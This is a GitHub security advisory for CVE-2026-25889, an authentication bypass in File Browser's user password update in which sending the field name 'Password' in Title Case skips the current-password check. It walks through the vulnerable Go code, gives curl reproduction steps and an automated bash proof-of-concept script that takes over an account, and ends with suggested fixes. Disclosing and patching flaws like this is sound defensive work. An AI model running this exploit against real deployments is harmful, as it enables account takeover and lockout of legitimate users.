Skip to content

File Browser has an Authentication Bypass in User Password Update

Moderate severity GitHub Reviewed Published Feb 8, 2026 in filebrowser/filebrowser • Updated Feb 10, 2026

Package

gomod github.com/filebrowser/filebrowser/v2 (Go)

Affected versions

<= 2.57.0

Patched versions

2.57.1

Description

Security Advisory: Authentication Bypass in User Password Update

Summary

A case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.

CVSS Score: 7.5 (High)
CWE: CWE-178 (Improper Handling of Case Sensitivity)

Details

The vulnerability exists in http/users.go in the userPutHandler function (lines 181-200).

Vulnerable Code

// http/users.go:181-200
if d.settings.AuthMethod == auth.MethodJSONAuth {
    var sensibleFields = map[string]struct{}{
        "all":          {},
        "username":     {},
        "password":     {},  // lowercase
        "scope":        {},
        "lockPassword": {},
        "commands":     {},
        "perm":         {},
    }

    for _, field := range req.Which {
        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup
            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
            }
            break
        }
    }
}

Root Cause

  1. The sensibleFields map uses lowercase keys (e.g., "password")
  2. The lookup sensibleFields[field] is case-sensitive
  3. When req.Which contains "Password" (Title Case), the lookup returns false
  4. The password verification block is skipped entirely
  5. Later in the code (line 229), field names are converted to Title Case for processing, so "Password" is a valid field name

Attack Flow

1. Attacker obtains victim's JWT token (via XSS, log leakage, etc.)
2. Attacker sends PUT /api/users/{id} with:
   - which: ["Password"]  (Title Case - bypasses validation)
   - data.password: "attacker_password"
   - NO current_password field required
3. Password is changed without verification
4. Victim is locked out, attacker has full access

PoC

Prerequisites

  • A valid JWT token for any user account
  • Target Filebrowser instance using JSON authentication (default)

Reproduction Steps

Step 1: Obtain a valid JWT token

TOKEN=$(curl -s -X POST "http://target:8080/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"victim","password":"victim_password"}')

Step 2: Attempt normal password change (should fail)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["password"],
    "data": {"id": 1, "password": "NewPassword123456"}
  }'
# Response: 400 Bad Request (the current password is incorrect)

Step 3: Bypass with Title Case (succeeds without current_password)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["Password"],
    "data": {"id": 1, "password": "HackedPassword123"}
  }'
# Response: 200 OK

Step 4: Verify account takeover

# Original password no longer works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"victim_password"}'
# Response: 403 Forbidden

# New password works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"HackedPassword123"}'
# Response: Valid JWT token

Automated PoC Script

#!/bin/bash
# Usage: ./poc.sh <target> <username> <current_password> <new_password>

TARGET="$1"
USERNAME="$2"
CURRENT_PASS="$3"
NEW_PASS="$4"

# Login
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"password\":\"$CURRENT_PASS\"}")

# Get user ID from token
USER_ID=$(echo "$TOKEN" | python3 -c "
import sys,json,base64
parts=input().split('.')
payload=json.loads(base64.b64decode(parts[1]+'=='))
print(payload['user']['id'])
")

# Exploit: Change password without current_password
curl -s -X PUT "$TARGET/api/users/$USER_ID" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"what\": \"user\",
    \"which\": [\"Password\"],
    \"data\": {\"id\": $USER_ID, \"password\": \"$NEW_PASS\"}
  }"

echo "Password changed to: $NEW_PASS"

Impact

Who is Impacted

  • All Filebrowser users using JSON authentication method (default configuration)
  • Any user whose JWT token can be obtained by an attacker
  • Particularly high-value targets: administrator accounts

Attack Scenarios

Scenario Impact
XSS + Token Theft Complete account takeover
JWT in Server Logs Mass account compromise
Shared Computer Session hijacking
Malicious Browser Extension Credential theft

Security Impact

Category Severity
Confidentiality High - Attacker gains full account access
Integrity High - Attacker can modify all user data
Availability High - Legitimate user locked out

Scope

  • The vulnerability affects password modification only
  • Other sensitive fields (Username, Scope, Perm, etc.) have additional protection via NonModifiableFieldsForNonAdmin check
  • However, for administrators, all fields can be modified using this bypass technique

Suggested Fix

Option 1: Case-insensitive field matching (Recommended)

// Convert field to lowercase before checking
for _, field := range req.Which {
    if _, ok := sensibleFields[strings.ToLower(field)]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

Option 2: Use Title Case in sensibleFields

var sensibleFields = map[string]struct{}{
    "All":          {},
    "Username":     {},
    "Password":     {},  // Title Case to match post-transformation
    "Scope":        {},
    "LockPassword": {},
    "Commands":     {},
    "Perm":         {},
}

// Check AFTER field name transformation
for k, v := range req.Which {
    v = cases.Title(language.English, cases.NoLower).String(v)
    req.Which[k] = v
    
    // Now check with Title Case
    if _, ok := sensibleFields[v]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

References

  • Affected File: http/users.go
  • Affected Lines: 181-200
  • Related Code: NonModifiableFieldsForNonAdmin (line 17)

References

@hacdias hacdias published to filebrowser/filebrowser Feb 8, 2026
Published by the National Vulnerability Database Feb 9, 2026
Published to the GitHub Advisory Database Feb 10, 2026
Reviewed Feb 10, 2026
Last updated Feb 10, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

Improper Handling of Case Sensitivity

The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results. Learn more on MITRE.

CVE ID

CVE-2026-25889

GHSA ID

GHSA-hxw8-4h9j-hq2r

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.